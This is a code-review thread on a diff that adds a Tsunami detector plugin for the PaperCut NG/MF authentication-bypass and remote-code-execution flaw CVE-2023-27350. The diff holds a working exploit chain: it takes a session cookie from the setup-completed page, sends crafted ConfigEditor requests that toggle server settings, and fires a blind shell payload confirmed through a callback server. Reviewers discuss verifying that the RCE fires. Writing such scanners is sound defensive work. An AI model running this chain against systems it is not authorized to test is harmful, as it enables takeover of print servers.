community/detectors/papercut_ng_mf_CVE_2023_27350/src/main/java/com/google/tsunami/plugins/papercut/PapercutNGMFVulnDetectorWithPayload.java

```diff
@@ -0,0 +1,278 @@
+        "service=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField="
+            + settingName
+            + "&doQuickFind=Go";
+    String settingAction =
+        "service=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240="
+            + (enable ? "Y" : "N")
+            + "&%24Submit=Update";
+
+    // "Navigate" to the page
+    sendRequestPayload(RequestType.POST, rootUri + "app", settingNav, headers, networkService);
+
+    // Enable/Disable the setting
+    sendRequestPayload(RequestType.POST, rootUri + "app", settingAction, headers, networkService);
+  }
+
+  private boolean isServiceVulnerable(NetworkService networkService) {
+    String rootUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService);
+    boolean isVulnerable = false;
+    String JSESSION_ID = "";
+
+    // Generate the payload
+    PayloadGeneratorConfig config =
+        PayloadGeneratorConfig.newBuilder()
+            .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.BLIND_RCE)
+            .setInterpretationEnvironment(
+                PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL)
+            .setExecutionEnvironment(
+                PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT)
+            .build();
+
+    Payload payload = this.payloadGenerator.generate(config);
+
+    if (!payload.getPayloadAttributes().getUsesCallbackServer()) return false;
+
+    // Get the JSESSION_ID (if present)
+    HttpHeaders basicHeader = HttpHeaders.builder().addHeader("Origin", rootUri).build();
+    HttpRequest req =
+        HttpRequest.get(rootUri + "app?service=page/SetupCompleted")
+            .setHeaders(basicHeader)
+            .build();
+
+    try {
+      // Try to get the JSESSION_ID cookie and see if the page can be loaded
+      HttpResponse resp = httpClient.send(req, networkService);
+      String setCookiesHeader = resp.headers().get("Set-Cookie").orElse("");
+      String bodyContent = resp.bodyString().orElse("");
+
+      Matcher jsessionIdMatcher =
+          Pattern.compile("JSESSIONID=[a-zA-Z0-9.]+;", Pattern.CASE_INSENSITIVE)
+              .matcher(setCookiesHeader);
+
+      Matcher bodyContentMatcher =
+          Pattern.compile("Configuration Wizard : Setup Complete").matcher(bodyContent);
+
+      if (resp.status() == HttpStatus.OK && bodyContentMatcher.find() && jsessionIdMatcher.find()) {
+        JSESSION_ID = jsessionIdMatcher.group();
+        isVulnerable = true;
+      } else {
+        isVulnerable = false;
+      }
+    } catch (IOException err) {
+      logger.atWarning().withCause(err).log();
+    }
+
+    if (isVulnerable) {
+      // Prepare the PaperCut NG/MF instance for the payload
+      HttpHeaders payloadHeaders =
+          HttpHeaders.builder()
+              .addHeader("Origin", rootUri)
+              .addHeader("Cookie", JSESSION_ID)
```

Comment:
@maoning As part of the logic, if a JSESSION_ID is able to be retrieved from the `Set-Cookie` header, the JSESSION_ID will be set as a header that is then being passed into each subsequent requests

Reply:
In your local testing, were you able to verify that the plugin triggers a curl request to the callback server using the current logic as it is? You can verify the callback interaction by checking the log in stdout from a Tsunami run. You should see something like:

INFO: Sending HTTP 'GET' request to 'http://127.0.0.1:8880/?secret=<unique secret>'.
INFO: Received HTTP response with code '200' for request to 'http://127.0.0.1:8880/?secret=<unique secret>'.

If you `curl 'http://127.0.0.1:8880/?secret=<unique secret>'`, you should see
```
{
  "hasHttpInteraction": true
}
``` 
which indicates the existence of the callback, which means RCE was successful.

Based on my local testing, just setting the cookie to JSESSION_ID is not sufficient to trigger the RCE.

Reply:
Fixed 😄 --> Part of the issue was that the JSESSION_ID kept being iteratively updated